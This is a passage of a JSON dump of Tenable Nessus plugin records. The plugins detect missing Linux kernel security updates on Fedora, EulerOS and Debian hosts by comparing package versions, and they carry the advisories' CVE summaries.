value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"kernel-4.4.4-200.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:34", "description": "The 4.4.4 update contains a number of important fixes across the tree.\nThis also includes an important update for XFS utils.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-14T00:00:00", "type": "nessus", "title": "Fedora 23 : kernel-4.4.4-301.fc23 (2016-e6cfaff4b1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2847"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-E6CFAFF4B1.NASL", "href": "https://www.tenable.com/plugins/nessus/89893", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-e6cfaff4b1.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89893);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-2847\");\n script_xref(name:\"FEDORA\", value:\"2016-e6cfaff4b1\");\n\n script_name(english:\"Fedora 23 : kernel-4.4.4-301.fc23 (2016-e6cfaff4b1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.4.4 update contains a number of important fixes across the tree.\nThis also includes an important update for XFS utils.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1313428\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1314253\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/178663.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?aeefc342\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"kernel-4.4.4-301.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:20:31", "description": "According to the versions of the kernel packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - The iscsi_if_rx function in drivers/scsi/scsi_transport_iscsi.c in the Linux kernel through 4.13.2 allows local users to cause a denial of service (panic) by leveraging incorrect length validation.(CVE-2017-14489)\n\n - The move_pages system call in mm/migrate.c in the Linux kernel before 4.12.9 doesn't check the effective uid of the target process, enabling a local attacker to learn the memory layout of a setuid executable despite ASLR.(CVE-2017-14140)\n\n - The offset2lib patch as used in the Linux Kernel contains a vulnerability that allows a PIE binary to be execve()'ed with 1GB of arguments or environmental strings then the stack occupies the address 0x80000000 and the PIE binary is mapped above 0x40000000 nullifying the protection of the offset2lib patch. This affects Linux Kernel version 4.11.5 and earlier. This is a different issue than CVE-2017-1000371. This issue appears to be limited to i386 based systems.(CVE-2017-1000370)\n\n - Race condition in fs/timerfd.c in the Linux kernel before 4.10.15 allows local users to gain privileges or cause a denial of service (list corruption or use-after-free) via simultaneous file-descriptor operations that leverage improper might_cancel queueing.(CVE-2017-10661)\n\n - The acpi_ns_evaluate() function in drivers/acpi/acpica/nseval.c in the Linux kernel through 4.12.9 does not flush the operand cache and causes a kernel stack dump, which allows local users to obtain sensitive information from kernel memory and bypass the KASLR protection mechanism (in the kernel through 4.9) via a crafted ACPI table.(CVE-2017-13695)\n\n - The acpi_ps_complete_final_op() function in drivers/acpi/acpica/psobject.c in the Linux kernel through 4.12.9 does not flush the node and node_ext caches and causes a kernel stack dump, which allows local users to obtain sensitive information from kernel memory and bypass the KASLR protection mechanism (in the kernel through 4.9) via a crafted ACPI table.(CVE-2017-13694)\n\n - The acpi_ds_create_operands() function in drivers/acpi/acpica/dsutils.c in the Linux kernel through 4.12.9 does not flush the operand cache and causes a kernel stack dump, which allows local users to obtain sensitive information from kernel memory and bypass the KASLR protection mechanism (in the kernel through 4.9) via a crafted ACPI table.(CVE-2017-13693)\n\n - The tcp_disconnect function in net/ipv4/tcp.c in the Linux kernel before 4.12 allows local users to cause a denial of service (__tcp_select_window divide-by-zero error and system crash) by triggering a disconnect within a certain tcp_recvmsg code path.(CVE-2017-14106)\n\n - The native Bluetooth stack in the Linux Kernel (BlueZ), starting at the Linux kernel version 3.3-rc1 and up to and including 4.13.1, are vulnerable to a stack overflow vulnerability in the processing of L2CAP configuration responses resulting in Remote code execution in kernel space.(CVE-2017-1000251\n\n - )\n\n - The prepare_vmcs02 function in arch/x86/kvm/vmx.c in the Linux kernel through 4.13.3 does not ensure that the 'CR8-load exiting' and 'CR8-store exiting' L0 vmcs02 controls exist in cases where L1 omits the 'use TPR shadow' vmcs12 control, which allows KVM L2 guest OS users to obtain read and write access to the hardware CR8 register.(CVE-2017-12154)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-11-16T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP1 : kernel (EulerOS-SA-2017-1245)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000251", "CVE-2017-1000370", "CVE-2017-1000371", "CVE-2017-10661", "CVE-2017-12154", "CVE-2017-13693", "CVE-2017-13694", "CVE-2017-13695", "CVE-2017-14106", "CVE-2017-14140", "CVE-2017-14489"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-debug", "p-cpe:/a:huawei:euleros:kernel-debuginfo", "p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-ori", "p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:python-perf", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1245.NASL", "href": "https://www.tenable.com/plugins/nessus/104578", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104578);\n script_version(\"3.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2017-1000251\",\n \"CVE-2017-1000370\",\n \"CVE-2017-10661\",\n \"CVE-2017-12154\",\n \"CVE-2017-13693\",\n \"CVE-2017-13694\",\n \"CVE-2017-13695\",\n \"CVE-2017-14106\",\n \"CVE-2017-14140\",\n \"CVE-2017-14489\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : kernel (EulerOS-SA-2017-1245)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel\n through 4.13.2 allows local users to cause a denial of\n service (panic) by leveraging incorrect length\n validation.(CVE-2017-14489)\n\n - The move_pages system call in mm/migrate.c in the Linux\n kernel before 4.12.9 doesn't check the effective uid of\n the target process, enabling a local attacker to learn\n the memory layout of a setuid executable despite\n ASLR.(CVE-2017-14140)\n\n - The offset2lib patch as used in the Linux Kernel\n contains a vulnerability that allows a PIE binary to be\n execve()'ed with 1GB of arguments or environmental\n strings then the stack occupies the address 0x80000000\n and the PIE binary is mapped above 0x40000000\n nullifying the protection of the offset2lib patch. This\n affects Linux Kernel version 4.11.5 and earlier. This\n is a different issue than CVE-2017-1000371. This issue\n appears to be limited to i386 based\n systems.(CVE-2017-1000370)\n\n - Race condition in fs/timerfd.c in the Linux kernel\n before 4.10.15 allows local users to gain privileges or\n cause a denial of service (list corruption or\n use-after-free) via simultaneous file-descriptor\n operations that leverage improper might_cancel\n queueing.(CVE-2017-10661)\n\n - The acpi_ns_evaluate() function in\n drivers/acpi/acpica/nseval.c in the Linux kernel\n through 4.12.9 does not flush the operand cache and\n causes a kernel stack dump, which allows local users to\n obtain sensitive information from kernel memory and\n bypass the KASLR protection mechanism (in the kernel\n through 4.9) via a crafted ACPI table.(CVE-2017-13695)\n\n - The acpi_ps_complete_final_op() function in\n drivers/acpi/acpica/psobject.c in the Linux kernel\n through 4.12.9 does not flush the node and node_ext\n caches and causes a kernel stack dump, which allows\n local users to obtain sensitive information from kernel\n memory and bypass the KASLR protection mechanism (in\n the kernel through 4.9) via a crafted ACPI\n table.(CVE-2017-13694)\n\n - The acpi_ds_create_operands() function in\n drivers/acpi/acpica/dsutils.c in the Linux kernel\n through 4.12.9 does not flush the operand cache and\n causes a kernel stack dump, which allows local users to\n obtain sensitive information from kernel memory and\n bypass the KASLR protection mechanism (in the kernel\n through 4.9) via a crafted ACPI table.(CVE-2017-13693)\n\n - The tcp_disconnect function in net/ipv4/tcp.c in the\n Linux kernel before 4.12 allows local users to cause a\n denial of service (__tcp_select_window divide-by-zero\n error and system crash) by triggering a disconnect\n within a certain tcp_recvmsg code path.(CVE-2017-14106)\n\n - The native Bluetooth stack in the Linux Kernel (BlueZ),\n starting at the Linux kernel version 3.3-rc1 and up to\n and including 4.13.1, are vulnerable to a stack\n overflow vulnerability in the processing of L2CAP\n configuration responses resulting in Remote code\n execution in kernel space.(CVE-2017-1000251\n\n - )\n\n - The prepare_vmcs02 function in arch/x86/kvm/vmx.c in\n the Linux kernel through 4.13.3 does not ensure that\n the 'CR8-load exiting' and 'CR8-store exiting' L0\n vmcs02 controls exist in cases where L1 omits the 'use\n TPR shadow' vmcs12 control, which allows KVM L2 guest\n OS users to obtain read and write access to the\n hardware CR8 register.(CVE-2017-12154)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1245\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?22a18c1d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-ori\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-229.49.1.149\",\n \"kernel-debug-3.10.0-229.49.1.149\",\n \"kernel-debuginfo-3.10.0-229.49.1.149\",\n \"kernel-debuginfo-common-x86_64-3.10.0-229.49.1.149\",\n \"kernel-devel-3.10.0-229.49.1.149\",\n \"kernel-headers-3.10.0-229.49.1.149\",\n \"kernel-ori-3.10.0-229\",\n \"kernel-tools-3.10.0-229.49.1.149\",\n \"kernel-tools-libs-3.10.0-229.49.1.149\",\n \"perf-3.10.0-229.49.1.149\",\n \"python-perf-3.10.0-229.49.1.149\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:26:43", "description": "The remote Debian host is running a version of the Linux kernel prior to 3.2.73-2+deb7u1 on Debian 7 or is running a version of the Linux kernel prior to 3.16.7-ckt20-1+deb8u1 on Debian 8. It is, therefore, affected by the following vulnerabilities :\n\n - A use-after-free error exists in the unix_dgram_poll() function within file net/unix/af_unix.c. A local attacker can exploit this, via specially crafted epoll_ctl calls, to cause a denial of service condition or bypass AF_UNIX socket permissions. (CVE-2013-7446)\n\n - A NULL pointer dereference flaw exists in the slhc_init() function within file drivers/net/slip/slhc.c due to improper validation of slot numbers. A local attacker can exploit this, via specially crafted PPPIOCSMAXCID IOCTL calls, to cause a denial of service condition. (CVE-2015-7799)\n\n - A flaw exists in the usbvision driver that allows a local attacker, via a nonzero bInterfaceNumber value in a USB device descriptor, to cause a kernel panic, resulting in a denial of service condition.\n (CVE-2015-7833)\n\n - An infinite loop condition exists in the KVM subsystem on some unspecified CPU chipsets. A local attacker who has sufficient privileges within a virtual guest OS can exploit this issue, by triggering many debug exceptions, to cause a denial of service condition. (CVE-2015-8104)\n\n - A flaw exists in the truncate_space_check() function within file /fs/btrfs/inode.c due to improper handling of compressed file extents. A local attacker can exploit this, via a clone action, to disclose sensitive pre-truncation information from a file. (CVE-2015-8374)\n\n - A NULL pointer dereference flaw exists in the inet_autobind() function within file net/ipv4/af_inet.c when handling connection attempts via IPv6. A local attacker can exploit this, via a specially crafted SOCK_RAW application that makes use of CLONE_NEWUSER support, to cause a denial of service condition or possibly gain elevated privileges. (CVE-2015-8543)", "cvss3": {}, "published": "2016-08-02T00:00:00", "type": "nessus", "title": "Debian DSA-3426-1 : Linux Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7446", "CVE-2015-7799", "CVE-2015-7833", "CVE-2015-8104", "CVE-2015-8374", "CVE-2015-8543"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:linux", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3426-1.NASL", "href": "https://www.tenable.com/plugins/nessus/92679", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were\n# extracted from Debian Security Advisory DSA-3426-1.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92679);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\n \"CVE-2013-7446\",\n \"CVE-2015-7799\",\n \"CVE-2015-7833\",\n \"CVE-2015-8104\",\n \"CVE-2015-8374\",\n \"CVE-2015-8543\"\n );\n script_bugtraq_id(\n 77030,\n 77033,\n 77524,\n 77638,\n 78219,\n 79698\n );\n script_xref(name:\"DSA\", value:\"3426\");\n\n script_name(english:\"Debian DSA-3426-1 : Linux Security Update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian host is running a version of the Linux kernel prior\nto 3.2.73-2+deb7u1 on Debian 7 or is running a version of the Linux\nkernel prior to 3.16.7-ckt20-1+deb8u1 on Debian 8. It is, therefore,\naffected by the following vulnerabilities :\n\n - A use-after-free error exists in the unix_dgram_poll()\n function within file net/unix/af_unix.c. A local\n attacker can exploit this, via specially crafted\n epoll_ctl calls, to cause a denial of service condition\n or bypass AF_UNIX socket permissions. (CVE-2013-7446)\n\n - A NULL pointer dereference flaw exists in the\n slhc_init() function within file drivers/net/slip/slhc.c\n due to improper validation of slot numbers. A local\n attacker can exploit this, via specially crafted\n PPPIOCSMAXCID IOCTL calls, to cause a denial of service\n condition. (CVE-2015-7799)\n\n - A flaw exists in the usbvision driver that allows a\n local attacker, via a nonzero bInterfaceNumber value in\n a USB device descriptor, to cause a kernel panic,\n resulting in a denial of service condition.\n (CVE-2015-7833)\n\n - An infinite loop condition exists in the KVM subsystem\n on some unspecified CPU chipsets. A local attacker who\n has sufficient privileges within a virtual guest OS can\n exploit this issue, by triggering many debug exceptions,\n to cause a denial of service condition. (CVE-2015-8104)\n\n - A flaw exists in the truncate_space_check() function\n within file /fs/btrfs/inode.c due to improper handling\n of compressed file extents. A local attacker can exploit\n this, via a clone action, to disclose sensitive\n pre-truncation information from a file. (CVE-2015-8374)\n\n - A NULL pointer dereference flaw exists in the\n inet_autobind() function within file net/ipv4/af_inet.c\n when handling connection attempts via IPv6. A local\n attacker can exploit this, via a specially crafted\n SOCK_RAW application that makes use of CLONE_NEWUSER\n support, to cause a denial of service condition or\n possibly gain elevated privileges. (CVE-2015-8543)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-7446\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2015-7799\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2015-7833\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2015-8104\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2015-8374\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2015-8543\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/wheezy/linux\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/jessie/linux\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.debian.org/security/2015/dsa-3426\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the Linux packages.\n\nFor the oldstable distribution (wheezy), these issues have been fixed\nin version 3.2.73-2+deb7u1. In addition, this update contains several\nchanges originally targeted for the Wheezy point release.\n\nFor the stable distribution (jessie), these issues have been fixed in\nversion 3.16.7-ckt20-1+deb8u1. In addition, this update contains\nseveral changes originally targeted for the Jessie point release.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/09/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"linux-doc-3.2\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-486\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-4kc-malta\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-5kc-malta\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-686-pae\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-all\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-all-amd64\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-all-armel\", reference:\"3.2.73-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"linux-headers-3.2.0-4-all-armhf\", 